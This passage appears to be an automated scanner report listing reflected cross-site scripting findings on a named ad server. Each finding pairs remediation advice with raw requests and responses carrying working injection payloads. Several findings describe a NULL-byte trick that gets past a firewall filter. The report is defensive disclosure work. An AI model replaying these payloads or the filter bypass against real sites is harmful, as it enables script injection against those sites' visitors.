Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916659;aduho=-360;rdclick=1afa9"-alert(1)-"5e2918b53ea HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3096

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/965634/0/5/AdId=701254;BnId=1;itime=210259538;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=1afa9"-alert(1)-"5e2918b53eahttp://www.toronto.com/restaurants/listing/000-142-237\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.124. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004485d"-alert(1)-"9bfdb9ede27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4485d"-alert(1)-"9bfdb9ede27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898454;aduho=-360;rdclick=&%004485d"-alert(1)-"9bfdb9ede27=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
r.adtechus.com/adlink/5214/965634/0/5/AdId=1081588;BnId=1;itime=210267210;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%004485d"-alert(1)-"9bfdb9ede27=1http://www.theindiankitchen.com/\" target=\"_blank\">
...[SNIP]...

2.125. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76aef"-alert(1)-"1f777c09e51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887141;aduho=-360;rdclick=&76aef"-alert(1)-"1f777c09e51=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3025

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965634/0/5/AdId=616420;BnId=1;itime=210263216;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&76aef"-alert(1)-"1f777c09e51=1http://fune.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.126. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965664/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0270"-alert(1)-"fce7a17ea8f was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965664/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_1;size=300x250;key=;grp=353;misc=1290373582641;aduho=-360;rdclick=f0270"-alert(1)-"fce7a17ea8f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1972

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965664/0/170/AdId=1114797;BnId=1;itime=384574978;nodecode=yes;link=f0270"-alert(1)-"fce7a17ea8fhttp://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.127. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965664/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9970b"-alert(1)-"82e6e6fe384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965664/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_1;size=300x250;key=;grp=353;misc=1290373582641;aduho=-360;rdclick=&9970b"-alert(1)-"82e6e6fe384=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 861

document.write("<SCR"+"IPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N3474.OliveNetwork/B4968347;sz=300x250;click=http%3A//adserver.adtechus.com/adlink%2F5214%2F965664%2F0%2F170%2FA
...[SNIP]...
<A HREF=\"http://adserver.adtechus.com/adlink/5214/965664/0/170/AdId=1257126;BnId=1;itime=384575931;nodecode=yes;link=&9970b"-alert(1)-"82e6e6fe384=1http://ad.doubleclick.net/jump/N3474.OliveNetwork/B4968347;sz=300x250;ord=384575931?\">
...[SNIP]...

2.128. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4b2"-alert(1)-"c3b22b0e939 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898573;aduho=-360;rdclick=6b4b2"-alert(1)-"c3b22b0e939 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
erver.adtechus.com/adlink/5214/965669/0/5/AdId=1081584;BnId=1;itime=210259843;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=6b4b2"-alert(1)-"c3b22b0e939http://www.penelopes.com\" target=\"_blank\">
...[SNIP]...

2.129. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007731e"-alert(1)-"3e904f9efd4 was submitted in the loc parameter. This input was echoed as 7731e"-alert(1)-"3e904f9efd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916800;aduho=-360;rdclick=%007731e"-alert(1)-"3e904f9efd4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2042

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
er.adtechus.com/adlink/5214/965669/0/5/AdId=1218159;BnId=1;itime=359142360;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%007731e"-alert(1)-"3e904f9efd4http://tartan.sites.toronto.com/\" target=\"_blank\">
...[SNIP]...

2.130. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0072162"-alert(1)-"24189c1587b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72162"-alert(1)-"24189c1587b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887265;aduho=-360;rdclick=&%0072162"-alert(1)-"24189c1587b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3040

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
://adserver.adtechus.com/adlink/5214/965669/0/5/AdId=865473;BnId=1;itime=224539738;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%0072162"-alert(1)-"24189c1587b=1http://verona.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.131. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ace65"-alert(1)-"e8841d7853d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887265;aduho=-360;rdclick=&ace65"-alert(1)-"e8841d7853d=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3007

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965669/0/5/AdId=616759;BnId=1;itime=210264485;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&ace65"-alert(1)-"e8841d7853d=1http://www.brassrailtavern.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.132. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d51f7"-alert(1)-"405d6c1372f was submitted in the loc parameter. This input was echoed as d51f7"-alert(1)-"405d6c1372f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887032;aduho=-360;rdclick=%00d51f7"-alert(1)-"405d6c1372f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3065

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
p://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=608796;BnId=1;itime=210258088;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00d51f7"-alert(1)-"405d6c1372fhttp://www.chartreuserestaurant.com/home.html\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.133. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb20"-alert(1)-"79a77dae1 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=440;misc=1290207938340;aduho=-360;rdclick=4cb20"-alert(1)-"79a77dae1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2019

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
http://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=616923;BnId=1;itime=210258241;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=4cb20"-alert(1)-"79a77dae1http://www.salonfortelliandspa.com\" target=\"_blank\">
...[SNIP]...

2.134. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ee4"-alert(1)-"276366267fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887032;aduho=-360;rdclick=&29ee4"-alert(1)-"276366267fc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3069

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
